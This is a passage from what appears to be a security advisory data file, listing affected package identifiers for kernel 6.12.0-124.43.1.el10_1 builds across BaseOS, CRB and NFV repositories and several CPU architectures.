"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
